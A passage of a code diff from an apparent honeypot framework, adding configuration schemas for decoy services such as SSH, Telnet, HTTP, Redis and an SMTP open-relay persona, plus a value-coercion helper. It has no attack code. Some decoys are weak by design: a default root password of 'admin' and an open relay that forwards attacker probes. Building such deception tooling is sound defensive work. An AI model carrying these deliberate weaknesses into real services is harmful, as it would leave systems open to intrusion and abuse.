existing `if "X" in cfg` guards keep working.
|
||||||
|
"""
|
||||||
|
out: dict[str, Any] = {}
|
||||||
|
if not cfg:
|
||||||
|
return out
|
||||||
|
by_key = {f.key: f for f in self.config_schema}
|
||||||
|
for key, raw in cfg.items():
|
||||||
|
spec = by_key.get(key)
|
||||||
|
if spec is None:
|
||||||
|
continue # drop unknown keys
|
||||||
|
if raw is None or raw == "":
|
||||||
|
continue
|
||||||
|
out[key] = _coerce(spec, raw)
|
||||||
|
return out
|
||||||
|
|
||||||
|
|
||||||
|
def _coerce(spec: ServiceConfigField, raw: Any) -> Any:
|
||||||
|
t = spec.type
|
||||||
|
if t in ("string", "password"):
|
||||||
|
return str(raw)
|
||||||
|
if t == "textarea":
|
||||||
|
s = str(raw)
|
||||||
|
if s.startswith(TEXTAREA_B64_PREFIX):
|
||||||
|
try:
|
||||||
|
return base64.b64decode(s[len(TEXTAREA_B64_PREFIX):], validate=True).decode("utf-8")
|
||||||
|
except (binascii.Error, UnicodeDecodeError) as e:
|
||||||
|
raise ConfigValidationError(
|
||||||
|
f"{spec.key}: malformed {TEXTAREA_B64_PREFIX} payload"
|
||||||
|
) from e
|
||||||
|
return s
|
||||||
|
if t == "int":
|
||||||
|
try:
|
||||||
|
return int(raw)
|
||||||
|
except (TypeError, ValueError) as e:
|
||||||
|
raise ConfigValidationError(f"{spec.key}: expected int, got {raw!r}") from e
|
||||||
|
if t == "bool":
|
||||||
|
if isinstance(raw, bool):
|
||||||
|
return raw
|
||||||
|
if isinstance(raw, str):
|
||||||
|
if raw.lower() in ("true", "1", "yes", "on"):
|
||||||
|
return True
|
||||||
|
if raw.lower() in ("false", "0", "no", "off"):
|
||||||
|
return False
|
||||||
|
raise ConfigValidationError(f"{spec.key}: expected bool, got {raw!r}")
|
||||||
|
if t == "enum":
|
||||||
|
s = str(raw)
|
||||||
|
if spec.enum and s not in spec.enum:
|
||||||
|
raise ConfigValidationError(
|
||||||
|
f"{spec.key}: {s!r} not in allowed values {spec.enum}"
|
||||||
|
)
|
||||||
|
return s
|
||||||
|
raise ConfigValidationError(f"{spec.key}: unknown field type {t!r}")
|
||||||
|
|||||||
@@ -12,6 +12,7 @@ class ConpotService(BaseService):
|
|||||||
name = "conpot"
|
name = "conpot"
|
||||||
ports = [502, 161, 80]
|
ports = [502, 161, 80]
|
||||||
default_image = "build"
|
default_image = "build"
|
||||||
|
# config_schema: no user-tunable fields yet — TODO add when compose_fragment grows cfg reads
|
||||||
|
|
||||||
def compose_fragment(self, decky_name: str, log_target: str | None = None, service_cfg: dict | None = None) -> dict:
|
def compose_fragment(self, decky_name: str, log_target: str | None = None, service_cfg: dict | None = None) -> dict:
|
||||||
env = {
|
env = {
|
||||||
|
|||||||
@@ -8,6 +8,7 @@ class DockerAPIService(BaseService):
|
|||||||
name = "docker_api"
|
name = "docker_api"
|
||||||
ports = [2375, 2376]
|
ports = [2375, 2376]
|
||||||
default_image = "build"
|
default_image = "build"
|
||||||
|
# config_schema: no user-tunable fields yet — TODO add when compose_fragment grows cfg reads
|
||||||
|
|
||||||
def compose_fragment(self, decky_name: str, log_target: str | None = None, service_cfg: dict | None = None) -> dict:
|
def compose_fragment(self, decky_name: str, log_target: str | None = None, service_cfg: dict | None = None) -> dict:
|
||||||
fragment: dict = {
|
fragment: dict = {
|
||||||
|
|||||||
@@ -9,6 +9,7 @@ class ElasticsearchService(BaseService):
|
|||||||
name = "elasticsearch"
|
name = "elasticsearch"
|
||||||
ports = [9200]
|
ports = [9200]
|
||||||
default_image = "build"
|
default_image = "build"
|
||||||
|
# config_schema: no user-tunable fields yet — TODO add when compose_fragment grows cfg reads
|
||||||
|
|
||||||
def compose_fragment(self, decky_name: str, log_target: str | None = None, service_cfg: dict | None = None) -> dict:
|
def compose_fragment(self, decky_name: str, log_target: str | None = None, service_cfg: dict | None = None) -> dict:
|
||||||
fragment: dict = {
|
fragment: dict = {
|
||||||
|
|||||||
@@ -8,6 +8,7 @@ class FTPService(BaseService):
|
|||||||
name = "ftp"
|
name = "ftp"
|
||||||
ports = [21]
|
ports = [21]
|
||||||
default_image = "build"
|
default_image = "build"
|
||||||
|
# config_schema: no user-tunable fields yet — TODO add when compose_fragment grows cfg reads
|
||||||
|
|
||||||
def compose_fragment(self, decky_name: str, log_target: str | None = None, service_cfg: dict | None = None) -> dict:
|
def compose_fragment(self, decky_name: str, log_target: str | None = None, service_cfg: dict | None = None) -> dict:
|
||||||
fragment: dict = {
|
fragment: dict = {
|
||||||
|
|||||||
@@ -1,6 +1,6 @@
|
|||||||
import json
|
import json
|
||||||
from pathlib import Path
|
from pathlib import Path
|
||||||
from decnet.services.base import BaseService
|
from decnet.services.base import BaseService, ServiceConfigField
|
||||||
|
|
||||||
TEMPLATES_DIR = Path(__file__).parent.parent / "templates" / "http"
|
TEMPLATES_DIR = Path(__file__).parent.parent / "templates" / "http"
|
||||||
|
|
||||||
@@ -10,6 +10,41 @@ class HTTPService(BaseService):
|
|||||||
ports = [80, 443]
|
ports = [80, 443]
|
||||||
default_image = "build"
|
default_image = "build"
|
||||||
|
|
||||||
|
config_schema = [
|
||||||
|
ServiceConfigField(
|
||||||
|
key="server_header",
|
||||||
|
label="Server header",
|
||||||
|
type="string",
|
||||||
|
placeholder="Apache/2.4.41 (Ubuntu)",
|
||||||
|
help="Value sent in the HTTP Server: response header.",
|
||||||
|
),
|
||||||
|
ServiceConfigField(
|
||||||
|
key="response_code",
|
||||||
|
label="Default response code",
|
||||||
|
type="int",
|
||||||
|
default=200,
|
||||||
|
),
|
||||||
|
ServiceConfigField(
|
||||||
|
key="fake_app",
|
||||||
|
label="Fake application",
|
||||||
|
type="enum",
|
||||||
|
enum=["none", "wordpress", "phpmyadmin", "tomcat", "jenkins"],
|
||||||
|
default="none",
|
||||||
|
help="Pre-baked application skin to render on the index page.",
|
||||||
|
),
|
||||||
|
ServiceConfigField(
|
||||||
|
key="extra_headers",
|
||||||
|
label="Extra headers (JSON or raw)",
|
||||||
|
type="textarea",
|
||||||
|
placeholder='{"X-Powered-By": "PHP/7.4.3"}',
|
||||||
|
),
|
||||||
|
ServiceConfigField(
|
||||||
|
key="custom_body",
|
||||||
|
label="Custom response body",
|
||||||
|
type="textarea",
|
||||||
|
),
|
||||||
|
]
|
||||||
|
|
||||||
def compose_fragment(
|
def compose_fragment(
|
||||||
self,
|
self,
|
||||||
decky_name: str,
|
decky_name: str,
|
||||||
|
|||||||
@@ -1,6 +1,6 @@
|
|||||||
import json
|
import json
|
||||||
from pathlib import Path
|
from pathlib import Path
|
||||||
from decnet.services.base import BaseService
|
from decnet.services.base import BaseService, ServiceConfigField
|
||||||
|
|
||||||
TEMPLATES_DIR = Path(__file__).parent.parent / "templates" / "https"
|
TEMPLATES_DIR = Path(__file__).parent.parent / "templates" / "https"
|
||||||
|
|
||||||
@@ -10,6 +10,57 @@ class HTTPSService(BaseService):
|
|||||||
ports = [443]
|
ports = [443]
|
||||||
default_image = "build"
|
default_image = "build"
|
||||||
|
|
||||||
|
config_schema = [
|
||||||
|
ServiceConfigField(
|
||||||
|
key="server_header",
|
||||||
|
label="Server header",
|
||||||
|
type="string",
|
||||||
|
placeholder="nginx/1.18.0",
|
||||||
|
),
|
||||||
|
ServiceConfigField(
|
||||||
|
key="response_code",
|
||||||
|
label="Default response code",
|
||||||
|
type="int",
|
||||||
|
default=200,
|
||||||
|
),
|
||||||
|
ServiceConfigField(
|
||||||
|
key="fake_app",
|
||||||
|
label="Fake application",
|
||||||
|
type="enum",
|
||||||
|
enum=["none", "wordpress", "phpmyadmin", "tomcat", "jenkins"],
|
||||||
|
default="none",
|
||||||
|
),
|
||||||
|
ServiceConfigField(
|
||||||
|
key="extra_headers",
|
||||||
|
label="Extra headers (JSON or raw)",
|
||||||
|
type="textarea",
|
||||||
|
),
|
||||||
|
ServiceConfigField(
|
||||||
|
key="custom_body",
|
||||||
|
label="Custom response body",
|
||||||
|
type="textarea",
|
||||||
|
),
|
||||||
|
ServiceConfigField(
|
||||||
|
key="tls_cn",
|
||||||
|
label="TLS certificate CN",
|
||||||
|
type="string",
|
||||||
|
placeholder="mail.corp.local",
|
||||||
|
help="Common Name baked into the self-signed cert if no cert/key provided.",
|
||||||
|
),
|
||||||
|
ServiceConfigField(
|
||||||
|
key="tls_cert",
|
||||||
|
label="TLS certificate (PEM)",
|
||||||
|
type="textarea",
|
||||||
|
secret=True,
|
||||||
|
),
|
||||||
|
ServiceConfigField(
|
||||||
|
key="tls_key",
|
||||||
|
label="TLS private key (PEM)",
|
||||||
|
type="textarea",
|
||||||
|
secret=True,
|
||||||
|
),
|
||||||
|
]
|
||||||
|
|
||||||
def compose_fragment(
|
def compose_fragment(
|
||||||
self,
|
self,
|
||||||
decky_name: str,
|
decky_name: str,
|
||||||
|
|||||||
@@ -8,6 +8,7 @@ class IMAPService(BaseService):
|
|||||||
name = "imap"
|
name = "imap"
|
||||||
ports = [143, 993]
|
ports = [143, 993]
|
||||||
default_image = "build"
|
default_image = "build"
|
||||||
|
# config_schema: no user-tunable fields yet — TODO add when compose_fragment grows cfg reads
|
||||||
|
|
||||||
def compose_fragment(self, decky_name: str, log_target: str | None = None, service_cfg: dict | None = None) -> dict:
|
def compose_fragment(self, decky_name: str, log_target: str | None = None, service_cfg: dict | None = None) -> dict:
|
||||||
fragment: dict = {
|
fragment: dict = {
|
||||||
|
|||||||
@@ -8,6 +8,7 @@ class KubernetesAPIService(BaseService):
|
|||||||
name = "k8s"
|
name = "k8s"
|
||||||
ports = [6443, 8080]
|
ports = [6443, 8080]
|
||||||
default_image = "build"
|
default_image = "build"
|
||||||
|
# config_schema: no user-tunable fields yet — TODO add when compose_fragment grows cfg reads
|
||||||
|
|
||||||
def compose_fragment(self, decky_name: str, log_target: str | None = None, service_cfg: dict | None = None) -> dict:
|
def compose_fragment(self, decky_name: str, log_target: str | None = None, service_cfg: dict | None = None) -> dict:
|
||||||
fragment: dict = {
|
fragment: dict = {
|
||||||
|
|||||||
@@ -8,6 +8,7 @@ class LDAPService(BaseService):
|
|||||||
name = "ldap"
|
name = "ldap"
|
||||||
ports = [389, 636]
|
ports = [389, 636]
|
||||||
default_image = "build"
|
default_image = "build"
|
||||||
|
# config_schema: no user-tunable fields yet — TODO add when compose_fragment grows cfg reads
|
||||||
|
|
||||||
def compose_fragment(self, decky_name: str, log_target: str | None = None, service_cfg: dict | None = None) -> dict:
|
def compose_fragment(self, decky_name: str, log_target: str | None = None, service_cfg: dict | None = None) -> dict:
|
||||||
fragment: dict = {
|
fragment: dict = {
|
||||||
|
|||||||
@@ -15,6 +15,7 @@ class LLMNRService(BaseService):
|
|||||||
name = "llmnr"
|
name = "llmnr"
|
||||||
ports = [5355, 5353]
|
ports = [5355, 5353]
|
||||||
default_image = "build"
|
default_image = "build"
|
||||||
|
# config_schema: no user-tunable fields yet — TODO add when compose_fragment grows cfg reads
|
||||||
|
|
||||||
def compose_fragment(self, decky_name: str, log_target: str | None = None, service_cfg: dict | None = None) -> dict:
|
def compose_fragment(self, decky_name: str, log_target: str | None = None, service_cfg: dict | None = None) -> dict:
|
||||||
fragment: dict = {
|
fragment: dict = {
|
||||||
|
|||||||
@@ -8,6 +8,7 @@ class MongoDBService(BaseService):
|
|||||||
name = "mongodb"
|
name = "mongodb"
|
||||||
ports = [27017]
|
ports = [27017]
|
||||||
default_image = "build"
|
default_image = "build"
|
||||||
|
# config_schema: no user-tunable fields yet — TODO add when compose_fragment grows cfg reads
|
||||||
|
|
||||||
def compose_fragment(self, decky_name: str, log_target: str | None = None, service_cfg: dict | None = None) -> dict:
|
def compose_fragment(self, decky_name: str, log_target: str | None = None, service_cfg: dict | None = None) -> dict:
|
||||||
fragment: dict = {
|
fragment: dict = {
|
||||||
|
|||||||
@@ -8,6 +8,7 @@ class MQTTService(BaseService):
|
|||||||
name = "mqtt"
|
name = "mqtt"
|
||||||
ports = [1883]
|
ports = [1883]
|
||||||
default_image = "build"
|
default_image = "build"
|
||||||
|
# config_schema: no user-tunable fields yet — TODO add when compose_fragment grows cfg reads
|
||||||
|
|
||||||
def compose_fragment(self, decky_name: str, log_target: str | None = None, service_cfg: dict | None = None) -> dict:
|
def compose_fragment(self, decky_name: str, log_target: str | None = None, service_cfg: dict | None = None) -> dict:
|
||||||
fragment: dict = {
|
fragment: dict = {
|
||||||
|
|||||||
@@ -8,6 +8,7 @@ class MSSQLService(BaseService):
|
|||||||
name = "mssql"
|
name = "mssql"
|
||||||
ports = [1433]
|
ports = [1433]
|
||||||
default_image = "build"
|
default_image = "build"
|
||||||
|
# config_schema: no user-tunable fields yet — TODO add when compose_fragment grows cfg reads
|
||||||
|
|
||||||
def compose_fragment(self, decky_name: str, log_target: str | None = None, service_cfg: dict | None = None) -> dict:
|
def compose_fragment(self, decky_name: str, log_target: str | None = None, service_cfg: dict | None = None) -> dict:
|
||||||
fragment: dict = {
|
fragment: dict = {
|
||||||
|
|||||||
@@ -1,5 +1,5 @@
|
|||||||
from pathlib import Path
|
from pathlib import Path
|
||||||
from decnet.services.base import BaseService
|
from decnet.services.base import BaseService, ServiceConfigField
|
||||||
|
|
||||||
TEMPLATES_DIR = Path(__file__).parent.parent / "templates" / "mysql"
|
TEMPLATES_DIR = Path(__file__).parent.parent / "templates" / "mysql"
|
||||||
|
|
||||||
@@ -9,6 +9,16 @@ class MySQLService(BaseService):
|
|||||||
ports = [3306]
|
ports = [3306]
|
||||||
default_image = "build"
|
default_image = "build"
|
||||||
|
|
||||||
|
config_schema = [
|
||||||
|
ServiceConfigField(
|
||||||
|
key="version",
|
||||||
|
label="Advertised MySQL version",
|
||||||
|
type="string",
|
||||||
|
placeholder="8.0.36",
|
||||||
|
help="Sets the version banner the fake MySQL handshake reports.",
|
||||||
|
),
|
||||||
|
]
|
||||||
|
|
||||||
def compose_fragment(
|
def compose_fragment(
|
||||||
self,
|
self,
|
||||||
decky_name: str,
|
decky_name: str,
|
||||||
|
|||||||
@@ -8,6 +8,7 @@ class POP3Service(BaseService):
|
|||||||
name = "pop3"
|
name = "pop3"
|
||||||
ports = [110, 995]
|
ports = [110, 995]
|
||||||
default_image = "build"
|
default_image = "build"
|
||||||
|
# config_schema: no user-tunable fields yet — TODO add when compose_fragment grows cfg reads
|
||||||
|
|
||||||
def compose_fragment(self, decky_name: str, log_target: str | None = None, service_cfg: dict | None = None) -> dict:
|
def compose_fragment(self, decky_name: str, log_target: str | None = None, service_cfg: dict | None = None) -> dict:
|
||||||
fragment: dict = {
|
fragment: dict = {
|
||||||
|
|||||||
@@ -8,6 +8,7 @@ class PostgresService(BaseService):
|
|||||||
name = "postgres"
|
name = "postgres"
|
||||||
ports = [5432]
|
ports = [5432]
|
||||||
default_image = "build"
|
default_image = "build"
|
||||||
|
# config_schema: no user-tunable fields yet — TODO add when compose_fragment grows cfg reads
|
||||||
|
|
||||||
def compose_fragment(self, decky_name: str, log_target: str | None = None, service_cfg: dict | None = None) -> dict:
|
def compose_fragment(self, decky_name: str, log_target: str | None = None, service_cfg: dict | None = None) -> dict:
|
||||||
fragment: dict = {
|
fragment: dict = {
|
||||||
|
|||||||
@@ -1,5 +1,5 @@
|
|||||||
from pathlib import Path
|
from pathlib import Path
|
||||||
from decnet.services.base import BaseService
|
from decnet.services.base import BaseService, ServiceConfigField
|
||||||
|
|
||||||
TEMPLATES_DIR = Path(__file__).parent.parent / "templates" / "rdp"
|
TEMPLATES_DIR = Path(__file__).parent.parent / "templates" / "rdp"
|
||||||
|
|
||||||
@@ -9,6 +9,19 @@ class RDPService(BaseService):
|
|||||||
ports = [3389]
|
ports = [3389]
|
||||||
default_image = "build"
|
default_image = "build"
|
||||||
|
|
||||||
|
config_schema = [
|
||||||
|
ServiceConfigField(
|
||||||
|
key="nla",
|
||||||
|
label="Enable CredSSP / NLA",
|
||||||
|
type="bool",
|
||||||
|
default=False,
|
||||||
|
help=(
|
||||||
|
"Off by default — basic X.224 cookie capture is enough for most "
|
||||||
|
"attacker traffic and avoids the openssl cert-gen at container start."
|
||||||
|
),
|
||||||
|
),
|
||||||
|
]
|
||||||
|
|
||||||
def compose_fragment(self, decky_name: str, log_target: str | None = None, service_cfg: dict | None = None) -> dict:
|
def compose_fragment(self, decky_name: str, log_target: str | None = None, service_cfg: dict | None = None) -> dict:
|
||||||
fragment: dict = {
|
fragment: dict = {
|
||||||
"build": {"context": str(TEMPLATES_DIR)},
|
"build": {"context": str(TEMPLATES_DIR)},
|
||||||
|
|||||||
@@ -1,5 +1,5 @@
|
|||||||
from pathlib import Path
|
from pathlib import Path
|
||||||
from decnet.services.base import BaseService
|
from decnet.services.base import BaseService, ServiceConfigField
|
||||||
|
|
||||||
TEMPLATES_DIR = Path(__file__).parent.parent / "templates" / "redis"
|
TEMPLATES_DIR = Path(__file__).parent.parent / "templates" / "redis"
|
||||||
|
|
||||||
@@ -9,6 +9,23 @@ class RedisService(BaseService):
|
|||||||
ports = [6379]
|
ports = [6379]
|
||||||
default_image = "build"
|
default_image = "build"
|
||||||
|
|
||||||
|
config_schema = [
|
||||||
|
ServiceConfigField(
|
||||||
|
key="version",
|
||||||
|
label="Advertised Redis version",
|
||||||
|
type="string",
|
||||||
|
placeholder="7.2.4",
|
||||||
|
help="Reported by INFO server -> redis_version.",
|
||||||
|
),
|
||||||
|
ServiceConfigField(
|
||||||
|
key="os_string",
|
||||||
|
label="Advertised OS string",
|
||||||
|
type="string",
|
||||||
|
placeholder="Linux 5.15.0 x86_64",
|
||||||
|
help="Reported by INFO server -> os.",
|
||||||
|
),
|
||||||
|
]
|
||||||
|
|
||||||
def compose_fragment(
|
def compose_fragment(
|
||||||
self,
|
self,
|
||||||
decky_name: str,
|
decky_name: str,
|
||||||
|
|||||||
@@ -28,7 +28,7 @@ def _load_plugins() -> None:
|
|||||||
for cls in BaseService.__subclasses__():
|
for cls in BaseService.__subclasses__():
|
||||||
if not cls.__module__.startswith("decnet.services."):
|
if not cls.__module__.startswith("decnet.services."):
|
||||||
continue
|
continue
|
||||||
instance = cls()
|
instance = cls() # type: ignore[abstract]
|
||||||
_registry[instance.name] = instance
|
_registry[instance.name] = instance
|
||||||
_loaded = True
|
_loaded = True
|
||||||
|
|
||||||
|
|||||||
@@ -8,6 +8,7 @@ class SIPService(BaseService):
|
|||||||
name = "sip"
|
name = "sip"
|
||||||
ports = [5060]
|
ports = [5060]
|
||||||
default_image = "build"
|
default_image = "build"
|
||||||
|
# config_schema: no user-tunable fields yet — TODO add when compose_fragment grows cfg reads
|
||||||
|
|
||||||
def compose_fragment(self, decky_name: str, log_target: str | None = None, service_cfg: dict | None = None) -> dict:
|
def compose_fragment(self, decky_name: str, log_target: str | None = None, service_cfg: dict | None = None) -> dict:
|
||||||
fragment: dict = {
|
fragment: dict = {
|
||||||
|
|||||||
@@ -8,6 +8,7 @@ class SMBService(BaseService):
|
|||||||
name = "smb"
|
name = "smb"
|
||||||
ports = [445, 139]
|
ports = [445, 139]
|
||||||
default_image = "build"
|
default_image = "build"
|
||||||
|
# config_schema: no user-tunable fields yet — TODO add when compose_fragment grows cfg reads
|
||||||
|
|
||||||
def compose_fragment(self, decky_name: str, log_target: str | None = None, service_cfg: dict | None = None) -> dict:
|
def compose_fragment(self, decky_name: str, log_target: str | None = None, service_cfg: dict | None = None) -> dict:
|
||||||
fragment: dict = {
|
fragment: dict = {
|
||||||
|
|||||||
@@ -1,7 +1,7 @@
|
|||||||
import os
|
import os
|
||||||
from pathlib import Path
|
from pathlib import Path
|
||||||
|
|
||||||
from decnet.services.base import BaseService
|
from decnet.services.base import BaseService, ServiceConfigField
|
||||||
|
|
||||||
TEMPLATES_DIR = Path(__file__).parent.parent / "templates" / "smtp"
|
TEMPLATES_DIR = Path(__file__).parent.parent / "templates" / "smtp"
|
||||||
ARTIFACTS_ROOT = os.environ.get("DECNET_ARTIFACTS_ROOT", "/var/lib/decnet/artifacts")
|
ARTIFACTS_ROOT = os.environ.get("DECNET_ARTIFACTS_ROOT", "/var/lib/decnet/artifacts")
|
||||||
@@ -16,6 +16,24 @@ class SMTPService(BaseService):
|
|||||||
ports = [25, 587]
|
ports = [25, 587]
|
||||||
default_image = "build"
|
default_image = "build"
|
||||||
|
|
||||||
|
config_schema = [
|
||||||
|
ServiceConfigField(
|
||||||
|
key="banner",
|
||||||
|
label="SMTP greeting banner",
|
||||||
|
type="string",
|
||||||
|
placeholder="mail.corp.local ESMTP Postfix",
|
||||||
|
help="First line returned on TCP connect (220 ...).",
|
||||||
|
),
|
||||||
|
ServiceConfigField(
|
||||||
|
key="mta",
|
||||||
|
label="MTA persona",
|
||||||
|
type="enum",
|
||||||
|
enum=["postfix", "exim", "sendmail"],
|
||||||
|
default="postfix",
|
||||||
|
help="Shapes EHLO capability list and error wording.",
|
||||||
|
),
|
||||||
|
]
|
||||||
|
|
||||||
def compose_fragment(
|
def compose_fragment(
|
||||||
self,
|
self,
|
||||||
decky_name: str,
|
decky_name: str,
|
||||||
|
|||||||
@@ -1,7 +1,7 @@
|
|||||||
import os
|
import os
|
||||||
from pathlib import Path
|
from pathlib import Path
|
||||||
|
|
||||||
from decnet.services.base import BaseService
|
from decnet.services.base import BaseService, ServiceConfigField
|
||||||
|
|
||||||
# Reuses the same template as the smtp service — only difference is
|
# Reuses the same template as the smtp service — only difference is
|
||||||
# SMTP_OPEN_RELAY=1 in the environment, which enables the open relay persona.
|
# SMTP_OPEN_RELAY=1 in the environment, which enables the open relay persona.
|
||||||
@@ -18,6 +18,64 @@ class SMTPRelayService(BaseService):
|
|||||||
ports = [25, 587]
|
ports = [25, 587]
|
||||||
default_image = "build"
|
default_image = "build"
|
||||||
|
|
||||||
|
config_schema = [
|
||||||
|
ServiceConfigField(
|
||||||
|
key="banner",
|
||||||
|
label="SMTP greeting banner",
|
||||||
|
type="string",
|
||||||
|
placeholder="mail.corp.local ESMTP Postfix",
|
||||||
|
help="First line returned on TCP connect (220 ...).",
|
||||||
|
),
|
||||||
|
ServiceConfigField(
|
||||||
|
key="mta",
|
||||||
|
label="MTA persona",
|
||||||
|
type="enum",
|
||||||
|
enum=["postfix", "exim", "sendmail"],
|
||||||
|
default="postfix",
|
||||||
|
help="Shapes EHLO capability list and error wording.",
|
||||||
|
),
|
||||||
|
ServiceConfigField(
|
||||||
|
key="upstream_host",
|
||||||
|
label="Upstream relay host",
|
||||||
|
type="string",
|
||||||
|
placeholder="smtp.sendgrid.net",
|
||||||
|
help="Real SMTP relay used to forward probe emails. Leave blank to disable forwarding.",
|
||||||
|
),
|
||||||
|
ServiceConfigField(
|
||||||
|
key="upstream_port",
|
||||||
|
label="Upstream relay port",
|
||||||
|
type="int",
|
||||||
|
default=25,
|
||||||
|
help="Port on the upstream relay (25 or 587).",
|
||||||
|
),
|
||||||
|
ServiceConfigField(
|
||||||
|
key="upstream_user",
|
||||||
|
label="Upstream relay username",
|
||||||
|
type="string",
|
||||||
|
help="AUTH username for the upstream relay (optional).",
|
||||||
|
),
|
||||||
|
ServiceConfigField(
|
||||||
|
key="upstream_pass",
|
||||||
|
label="Upstream relay password",
|
||||||
|
type="string",
|
||||||
|
help="AUTH password for the upstream relay (optional).",
|
||||||
|
),
|
||||||
|
ServiceConfigField(
|
||||||
|
key="upstream_sender",
|
||||||
|
label="Upstream envelope sender",
|
||||||
|
type="string",
|
||||||
|
placeholder="probe@yourdomain.com",
|
||||||
|
help="Envelope MAIL FROM used when talking to the upstream relay. Set this to an address your server is authorised to send from so SPF passes at the recipient. The attacker's From: header inside the message is untouched.",
|
||||||
|
),
|
||||||
|
ServiceConfigField(
|
||||||
|
key="probe_limit",
|
||||||
|
label="Probe forward limit",
|
||||||
|
type="int",
|
||||||
|
default=1,
|
||||||
|
help="Number of emails per source IP to actually deliver upstream. All subsequent emails are silently quarantined.",
|
||||||
|
),
|
||||||
|
]
|
||||||
|
|
||||||
def compose_fragment(
|
def compose_fragment(
|
||||||
self,
|
self,
|
||||||
decky_name: str,
|
decky_name: str,
|
||||||
@@ -33,6 +91,7 @@ class SMTPRelayService(BaseService):
|
|||||||
"cap_add": ["NET_BIND_SERVICE"],
|
"cap_add": ["NET_BIND_SERVICE"],
|
||||||
"environment": {
|
"environment": {
|
||||||
"NODE_NAME": decky_name,
|
"NODE_NAME": decky_name,
|
||||||
|
"SMTP_SERVICE_NAME": "smtp_relay",
|
||||||
"SMTP_OPEN_RELAY": "1",
|
"SMTP_OPEN_RELAY": "1",
|
||||||
"SMTP_QUARANTINE_DIR": _IN_CONTAINER_QUARANTINE,
|
"SMTP_QUARANTINE_DIR": _IN_CONTAINER_QUARANTINE,
|
||||||
},
|
},
|
||||||
|
|||||||
@@ -16,6 +16,7 @@ class SnifferService(BaseService):
|
|||||||
name = "sniffer"
|
name = "sniffer"
|
||||||
ports: list[int] = []
|
ports: list[int] = []
|
||||||
default_image = "build"
|
default_image = "build"
|
||||||
|
# config_schema: no user-tunable fields yet — TODO add when compose_fragment grows cfg reads
|
||||||
fleet_singleton = True
|
fleet_singleton = True
|
||||||
|
|
||||||
def compose_fragment(
|
def compose_fragment(
|
||||||
|
|||||||
@@ -8,6 +8,7 @@ class SNMPService(BaseService):
|
|||||||
name = "snmp"
|
name = "snmp"
|
||||||
ports = [161]
|
ports = [161]
|
||||||
default_image = "build"
|
default_image = "build"
|
||||||
|
# config_schema: no user-tunable fields yet — TODO add when compose_fragment grows cfg reads
|
||||||
|
|
||||||
def compose_fragment(self, decky_name: str, log_target: str | None = None, service_cfg: dict | None = None) -> dict:
|
def compose_fragment(self, decky_name: str, log_target: str | None = None, service_cfg: dict | None = None) -> dict:
|
||||||
fragment: dict = {
|
fragment: dict = {
|
||||||
|
|||||||
@@ -1,7 +1,7 @@
|
|||||||
import os
|
import os
|
||||||
from pathlib import Path
|
from pathlib import Path
|
||||||
|
|
||||||
from decnet.services.base import BaseService
|
from decnet.services.base import BaseService, ServiceConfigField
|
||||||
|
|
||||||
TEMPLATES_DIR = Path(__file__).parent.parent / "templates" / "ssh"
|
TEMPLATES_DIR = Path(__file__).parent.parent / "templates" / "ssh"
|
||||||
ARTIFACTS_ROOT = os.environ.get("DECNET_ARTIFACTS_ROOT", "/var/lib/decnet/artifacts")
|
ARTIFACTS_ROOT = os.environ.get("DECNET_ARTIFACTS_ROOT", "/var/lib/decnet/artifacts")
|
||||||
@@ -25,6 +25,27 @@ class SSHService(BaseService):
|
|||||||
ports = [22]
|
ports = [22]
|
||||||
default_image = "build"
|
default_image = "build"
|
||||||
|
|
||||||
|
config_schema = [
|
||||||
|
ServiceConfigField(
|
||||||
|
key="password",
|
||||||
|
label="Root password",
|
||||||
|
type="password",
|
||||||
|
default="admin",
|
||||||
|
secret=True,
|
||||||
|
help="Plaintext root password for the in-container sshd.",
|
||||||
|
),
|
||||||
|
ServiceConfigField(
|
||||||
|
key="hostname",
|
||||||
|
label="Container hostname",
|
||||||
|
type="string",
|
||||||
|
help=(
|
||||||
|
"Cosmetic override for the SSH banner/PS1 — keeps the decoy "
|
||||||
|
"looking heterogeneous. Decky identity (NODE_NAME) is unaffected."
|
||||||
|
),
|
||||||
|
placeholder="e.g. mail-01.corp.local",
|
||||||
|
),
|
||||||
|
]
|
||||||
|
|
||||||
def compose_fragment(
|
def compose_fragment(
|
||||||
self,
|
self,
|
||||||
decky_name: str,
|
decky_name: str,
|
||||||
|
|||||||
@@ -1,7 +1,7 @@
|
|||||||
import os
|
import os
|
||||||
from pathlib import Path
|
from pathlib import Path
|
||||||
|
|
||||||
from decnet.services.base import BaseService
|
from decnet.services.base import BaseService, ServiceConfigField
|
||||||
|
|
||||||
TEMPLATES_DIR = Path(__file__).parent.parent / "templates" / "telnet"
|
TEMPLATES_DIR = Path(__file__).parent.parent / "templates" / "telnet"
|
||||||
ARTIFACTS_ROOT = os.environ.get("DECNET_ARTIFACTS_ROOT", "/var/lib/decnet/artifacts")
|
ARTIFACTS_ROOT = os.environ.get("DECNET_ARTIFACTS_ROOT", "/var/lib/decnet/artifacts")
|
||||||
@@ -24,6 +24,27 @@ class TelnetService(BaseService):
|
|||||||
ports = [23]
|
ports = [23]
|
||||||
default_image = "build"
|
default_image = "build"
|
||||||
|
|
||||||
|
config_schema = [
|
||||||
|
ServiceConfigField(
|
||||||
|
key="password",
|
||||||
|
label="Root password",
|
||||||
|
type="password",
|
||||||
|
default="admin",
|
||||||
|
secret=True,
|
||||||
|
help="Plaintext root password for the in-container telnetd.",
|
||||||
|
),
|
||||||
|
ServiceConfigField(
|
||||||
|
key="hostname",
|
||||||
|
label="Container hostname",
|
||||||
|
type="string",
|
||||||
|
placeholder="e.g. mail-01.corp.local",
|
||||||
|
help=(
|
||||||
|
"Cosmetic override for the telnet banner — keeps decoys "
|
||||||
|
"looking heterogeneous. Decky identity (NODE_NAME) is unaffected."
|
||||||
|
),
|
||||||
|
),
|
||||||
|
]
|
||||||
|
|
||||||
def compose_fragment(
|
def compose_fragment(
|
||||||
self,
|
self,
|
||||||
decky_name: str,
|
decky_name: str,
|
||||||
|
|||||||
@@ -8,6 +8,7 @@ class TFTPService(BaseService):
|
|||||||
name = "tftp"
|
name = "tftp"
|
||||||
ports = [69]
|
ports = [69]
|
||||||
default_image = "build"
|
default_image = "build"
|
||||||
|
# config_schema: no user-tunable fields yet — TODO add when compose_fragment grows cfg reads
|
||||||
|
|
||||||
def compose_fragment(self, decky_name: str, log_target: str | None = None, service_cfg: dict | None = None) -> dict:
|
def compose_fragment(self, decky_name: str, log_target: str | None = None, service_cfg: dict | None = None) -> dict:
|
||||||
fragment: dict = {
|
fragment: dict = {
|
||||||
|
|||||||
@@ -8,6 +8,7 @@ class VNCService(BaseService):
|
|||||||
name = "vnc"
|
name = "vnc"
|
||||||
ports = [5900]
|
